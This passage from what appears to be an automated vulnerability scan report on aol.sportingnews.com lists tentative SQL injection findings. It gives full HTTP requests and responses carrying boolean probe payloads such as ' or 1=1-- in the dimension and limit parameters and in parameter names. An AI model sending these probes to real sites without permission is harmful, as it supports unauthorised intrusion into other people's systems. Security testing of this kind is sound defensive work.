Date: Thu, 05 May 2011 01:12:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 105496

<!DOCTYPE html>

<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html class="n
...[SNIP]...
<h2>SPORTING NEWS FAN SHOP</h2>
<span><a href="http://www.fanatics.com/partnerid/9938/" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | Fan Shop | unit: homepage mast');" target="_blank">Get your favorite team gear</a></span>
</div>
<!-- breaking news -->
<a href="http://aol.sportingnews.com" class="sn-feed-logo">
<img src="http://st.snimg.com/image/feed/logos/logo_spnews_launch.png" alt="Sporting News Feed Logo">
</a>
<script>
$('form#header-search div.search-icon, form#footer-search div.search-icon').live('click', function(){
$(this).parent().parent().submit();
}).live('mouseover mouseout', function(event){
if (event.type == 'mouseover') {
$(this).addClass('on');
} else {
$(this).removeClass('on');
}
});
</script>
<!-- search -->
<div class="search rounded-corners clearfix">
<form id="header-search" method="get" action="/search">
<fieldset>
<label for="search-box">Find on SN</label>
<input id="search-box" name="search_term" type="text">
<div class="search-icon">Search</div>
</fieldset>
</form>
<div class="follow">
<span class="text">Follow SN</span>
<span class="facebook">
<a target="_blank" title="Sporting News Facebook Page" href="http://www.facebook.com/sportingnews">
Facebook
</a>
</span>
<span class="twitter">
<a target="_blank" title="Sporting News' Twitter Page" target="_blank" href="http://twitter.com/SportingNews">
Twitter
</a>
</span>
</div>
<div class="connect">
<span class="text">Connect with SN</span>
<span class="facebook-connect">
<fb:login-button show-faces="false" max-rows="1" width="80" auto
...[SNIP]...

Request 2

GET /?1%20and%201%3d2--%20=1 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
X-N: S
Cache-Control: max-age=28
Date: Thu, 05 May 2011 01:12:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 105521

<!DOCTYPE html>

<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html class="n
...[SNIP]...
<h2>FANTASY SOURCE BASEBALL</h2>
<span><a href="http://fantasysource.sportingnews.com/baseball/promo?affiliate_code=sn_home" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball - FREE Trial | unit: homepage mast');">Try it for FREE</a></span>
</div>
<!-- breaking news -->
<a href="http://aol.sportingnews.com" class="sn-feed-logo">
<img src="http://st.snimg.com/image/feed/logos/logo_spnews_launch.png" alt="Sporting News Feed Logo">
</a>
<script>
$('form#header-search div.search-icon, form#footer-search div.search-icon').live('click', function(){
$(this).parent().parent().submit();
}).live('mouseover mouseout', function(event){
if (event.type == 'mouseover') {
$(this).addClass('on');
} else {
$(this).removeClass('on');
}
});
</script>
<!-- search -->
<div class="search rounded-corners clearfix">
<form id="header-search" method="get" action="/search">
<fieldset>
<label for="search-box">Find on SN</label>
<input id="search-box" name="search_term" type="text">
<div class="search-icon">Search</div>
</fieldset>
</form>
<div class="follow">
<span class="text">Follow SN</span>
<span class="facebook">
<a target="_blank" title="Sporting News Facebook Page" href="http://www.facebook.com/sportingnews">
Facebook
</a>
</span>
<span class="twitter">
<a target="_blank" title="Sporting News' Twitter Page" target="_blank" href="http://twitter.com/SportingNews">
Twitter
</a>
</span>
</div>
<div class="connect">
<span class="text">Connect with SN</span>
<span class="facebook-connect">
<fb:login-button show-faces="false" max
...[SNIP]...

1.2. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://aol.sportingnews.com
Path:   /services/fantasy_source_rankings_ad.php

Issue detail

The dimension parameter appears to be vulnerable to SQL injection attacks. The payloads 29246186'%20or%201%3d1--%20 and 29246186'%20or%201%3d2--%20 were each submitted in the dimension parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x15029246186'%20or%201%3d1--%20&limit=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:15:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:16:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4594

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
e:11px; color:#000; }
#fs { display:block; width:180px; height:15029246186' or 1=1-- px; overflow:hidden; background:url(http://st.snimg.com/image/promos/fantasy-source/mlb-ad-bg-180x15029246186' or 1=1-- .jpg) no-repeat; }
#fs a, #fs a:visited { color:#004a85; font-weight:bold; text-decoration:none; }
#fs a:hover { color:#000; }
#fs h1 { font-size:17px; font-weight:bold; text-align:center; margin:9px 0; }
#fs table { border-collapse:collapse; border-bottom:1px solid #000; }
#fs th, #fs td { text-align:left; }
#fs th { border-bottom:1px solid #000; padding:0 7px 4px; }
#fs td { padding:4px 7px; border-left:1px solid #000; }
#fs td.rank { width:25px; border:none; text-align:center; }
#fs .more-link { text-align:right; margin:9px 11px 0 0; }
#fs .more-link a { font-size:12px; font-style:italic; font-weight:normal; }
#fs a.fs-logo { display:block; position:absolute; }
#fs.ad-300x250 table { width:280px; margin:0 10px; }
#fs.ad-300x250 a.fs-logo { width:300px; height:70px; top:180px; }
#fs.ad-728x90 h1 { width:220px; float:left; margin:12px 0 0 60px; line-height:1.2em; }
#fs.ad-728x90 h1, #fs.ad-728x90 .more-link a, #fs.ad-728x90 .more-link a:visited { color:#fff; }
#fs.ad-728x90 .more-link { width:220px; position:absolute; top:64px; left:60px; margin:0; text-align:center; }
#fs.ad-728x90 table { position:absolute; width:260px; top:7px; left:275px; }
#fs.ad-728x90 a.fs-logo { width:188px; height:90px; top:0; left:540px; }
#fs.ad-180x150 h1 { font-size:10px; margin:6px 0 2px; }
#fs.ad-180x150 table { width:172px; margin:0 4px; }
#fs.ad-180x150 th { padding:0 3px 3px; }
#fs.ad-180x150 td { padding:3px; }
#fs.ad-180x150 td.rank { width:5px; }
#fs.ad-180x150 .more-link { margin:4px 5px 0 0; }
#fs.ad-180x150 .more-link a { font-size:10px; }
#fs.ad-180x150 a.fs-logo { width:180px; height:45px; top:105px; }
</style>
<div id="fs" class="ad-180x15029246186' or 1=1-- ">
<h1>Fantasy Baseball 3B Rankings</h1>
<table>
<tr>
<th>Rk</th>
<th>Player</th>
<th>Pos</th>
<th>Tm</th>
</tr>
<tr>
<td class="rank">1</td>
<td><a href="http://fantasysource.sportingnew
...[SNIP]...

Request 2

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x15029246186'%20or%201%3d2--%20&limit=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:15:00 GMT
Cache-Control: max-age=280
Date: Thu, 05 May 2011 01:16:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4605

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
e:11px; color:#000; }
#fs { display:block; width:180px; height:15029246186' or 1=2-- px; overflow:hidden; background:url(http://st.snimg.com/image/promos/fantasy-source/mlb-ad-bg-180x15029246186' or 1=2-- .jpg) no-repeat; }
#fs a, #fs a:visited { color:#004a85; font-weight:bold; text-decoration:none; }
#fs a:hover { color:#000; }
#fs h1 { font-size:17px; font-weight:bold; text-align:center; margin:9px 0; }
#fs table { border-collapse:collapse; border-bottom:1px solid #000; }
#fs th, #fs td { text-align:left; }
#fs th { border-bottom:1px solid #000; padding:0 7px 4px; }
#fs td { padding:4px 7px; border-left:1px solid #000; }
#fs td.rank { width:25px; border:none; text-align:center; }
#fs .more-link { text-align:right; margin:9px 11px 0 0; }
#fs .more-link a { font-size:12px; font-style:italic; font-weight:normal; }
#fs a.fs-logo { display:block; position:absolute; }
#fs.ad-300x250 table { width:280px; margin:0 10px; }
#fs.ad-300x250 a.fs-logo { width:300px; height:70px; top:180px; }
#fs.ad-728x90 h1 { width:220px; float:left; margin:12px 0 0 60px; line-height:1.2em; }
#fs.ad-728x90 h1, #fs.ad-728x90 .more-link a, #fs.ad-728x90 .more-link a:visited { color:#fff; }
#fs.ad-728x90 .more-link { width:220px; position:absolute; top:64px; left:60px; margin:0; text-align:center; }
#fs.ad-728x90 table { position:absolute; width:260px; top:7px; left:275px; }
#fs.ad-728x90 a.fs-logo { width:188px; height:90px; top:0; left:540px; }
#fs.ad-180x150 h1 { font-size:10px; margin:6px 0 2px; }
#fs.ad-180x150 table { width:172px; margin:0 4px; }
#fs.ad-180x150 th { padding:0 3px 3px; }
#fs.ad-180x150 td { padding:3px; }
#fs.ad-180x150 td.rank { width:5px; }
#fs.ad-180x150 .more-link { margin:4px 5px 0 0; }
#fs.ad-180x150 .more-link a { font-size:10px; }
#fs.ad-180x150 a.fs-logo { width:180px; height:45px; top:105px; }
</style>
<div id="fs" class="ad-180x15029246186' or 1=2-- ">
<h1>Fantasy Baseball Overall Rankings</h1>
<table>
<tr>
<th>Rk</th>
<th>Player</th>
<th>Pos</th>
<th>Tm</th>
</tr>
<tr>
<td class="rank">1</td>
<td><a href="http://fantasysource.sporti
...[SNIP]...

1.3. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [limit parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://aol.sportingnews.com
Path:   /services/fantasy_source_rankings_ad.php

Issue detail

The limit parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the limit parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x150&limit=3'%20and%201%3d1--%20 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:32:33 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4376

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
<a href="http://fantasysource.sportingnews.com/baseball/player/7172/dan-haren" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Dan Haren</a></td>
<td>SP</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/3/los-angeles-angels" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">LAA</a></td>
</tr>
<tr class="alt">
<td class="rank">2</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/8180/clayton-kershaw" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Clayton Kershaw</a></td>
<td>SP</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/19/los-angeles-dodgers" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">LAD</a></td>
</tr>
<tr>
<td class="rank">3</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/7790/jon-lester" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Jon Lester</a></td>
<td>SP</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/2/boston-red-sox" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Bos</a></td>
</tr>
</table>
<div class="more-link"><a href="http://fantasysource.sportingnews.com/baseball/rankings?pagetype=SP" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | see full');">See Full Top SP Rankings</a></div>
<a href="http://fantasysource.sportingnews.com/baseball/home" class="fs-logo" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | logo');"></a>
...[SNIP]...

Request 2

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x150&limit=3'%20and%201%3d2--%20 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:32:34 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4386

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
<a href="http://fantasysource.sportingnews.com/baseball/player/5737/vladimir-guerrero" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Vladimir Guerrero</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/1/baltimore-orioles" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Bal</a></td>
</tr>
<tr class="alt">
<td class="rank">2</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/5909/david-ortiz" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">David Ortiz</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/2/boston-red-sox" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Bos</a></td>
</tr>
<tr>
<td class="rank">3</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/6980/travis-hafner" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Travis Hafner</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/5/cleveland-indians" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Cle</a></td>
</tr>
</table>
<div class="more-link"><a href="http://fantasysource.sportingnews.com/baseball/rankings?pagetype=DH" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | see full');">See Full Top DH Rankings</a></div>
<a href="http://fantasysource.sportingnews.com/baseball/home" class="fs-logo" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | log
...[SNIP]...

1.4. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://aol.sportingnews.com
Path:   /services/fantasy_source_rankings_ad.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 87821652%20or%201%3d1--%20 and 87821652%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x150&lim/187821652%20or%201%3d1--%20it=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:32:46 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5497

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
<h1>Fantasy Baseball DH Rankings</h1>
<table>
<tr>
<th>Rk</th>
<th>Player</th>
<th>Pos</th>
<th>Tm</th>
</tr>
<tr>
<td class="rank">1</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/5737/vladimir-guerrero" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Vladimir Guerrero</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/1/baltimore-orioles" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Bal</a></td>
</tr>
<tr class="alt">
<td class="rank">2</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/5909/david-ortiz" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">David Ortiz</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/2/boston-red-sox" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Bos</a></td>
</tr>
<tr>
<td class="rank">3</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/6980/travis-hafner" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Travis Hafner</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/5/cleveland-indians" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Cle</a></td>
</tr>
<tr class="alt">
<td class="rank">4</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/playe
...[SNIP]...

Request 2

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x150&lim/187821652%20or%201%3d2--%20it=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:32:46 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5513

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
<h1>Fantasy Baseball Overall Rankings</h1>
<table>
<tr>
<th>Rk</th>
<th>Player</th>
<th>Pos</th>
<th>Tm</th>
</tr>
<tr>
<td class="rank">1</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/6619/albert-pujols" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Albert Pujols</a></td>
<td>1B</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/24/st-louis-cardinals" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">StL</a></td>
</tr>
<tr class="alt">
<td class="rank">2</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/7488/hanley-ramirez" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Hanley Ramirez</a></td>
<td>SS</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/28/florida-marlins" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Fla</a></td>
</tr>
<tr>
<td class="rank">3</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/7946/joey-votto" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Joey Votto</a></td>
<td>1B</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/17/cincinnati-reds" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Cin</a></td>
</tr>
<tr class="alt">
<td class="rank">4</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/playe
...[SNIP]...

1.5. http://aol.sportingnews.com/services/sn-promos/yearbooks.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://aol.sportingnews.com
Path:   /services/sn-promos/yearbooks.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13762307%20or%201%3d1--%20 and 13762307%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/sn-promos/yearbooks.php?113762307%20or%201%3d1--%20=1 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=295
Date: Thu, 05 May 2011 01:31:59 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1331

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
